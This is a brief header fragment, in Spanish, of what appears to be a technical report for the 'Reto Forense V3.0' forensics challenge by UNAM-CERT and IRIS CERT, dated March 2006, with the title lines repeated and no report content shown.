Titulo: Informe Tcnico Fecha: 21/Mar/ 2006

Reto Forense V3.0 UNAM-CERT/ IRIS CERT

Titulo: Informe Tcnico Fecha: 21/Mar/ 2006

Reto Forense V3.0 UNAM-CERT/ IRIS CERT